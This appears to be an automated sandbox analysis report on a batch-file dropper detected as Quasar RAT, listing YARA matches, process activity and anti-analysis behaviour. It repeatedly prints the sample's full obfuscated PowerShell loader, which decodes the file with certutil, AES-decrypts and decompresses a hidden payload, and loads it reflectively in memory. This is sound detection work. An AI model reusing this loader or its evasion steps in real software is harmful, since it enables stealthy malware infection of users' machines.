          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11B9D6
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC119E22
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC111268
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC119076
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC112D98
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1107D1
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC110803
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC110C90
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A7F59
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AEBED
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A9456
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AD84C
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AA335
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\allah.bat.exe D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
          Source: deneme.batVirustotal: Detection: 16%
          Source: C:\Windows\System32\mode.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\allah.bat.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winBAT@8/6@0/1
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeMutant created: \Sessions\1\BaseNamedObjects\Local\c60dc807-eaae-43be-9bb5-d598c7ab3dad
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: deneme.batStatic file information: File size 2277691 > 1048576
          Source: Binary string: powershell.pdbUGP source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: Binary string: powershell.pdb source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11FA92 pushad ; ret
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122BAA push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122C83 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1E5334 push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AE1A1 push edx; iretd
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A7149 push eax; ret
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\allah.bat.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Users\user\AppData\Local\Temp\allah.bat.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Renames powershell.exe to bypass HIPS
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe TID: 3320Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWindow / User API: threadDelayed 9093
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477
          Source: deneme.batBinary or memory string: TnJOMEMzU29pQnNGcDI3KzNpbjJTQzU1T2xqSFBsOXFjazMvc21tWmtlZXJPRlFs
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: allah.bat.exe, 00000004.00000002.684807459.0000020E69C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: deneme.batBinary or memory string: c0xsTHFKTGhqemU5NWhvb1ZYMXlKdXBxZDllWXdCcmNqNmp3T2J1dlVSZzhjZzIv
          Source: deneme.batBinary or memory string: TXorajdZTlRaeWpSNURaeTRBZTlCRXg1ZjM4RkRPN0hrQkxjQTk1YVRkVmNETkxZ

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11AA8A CheckRemoteDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))
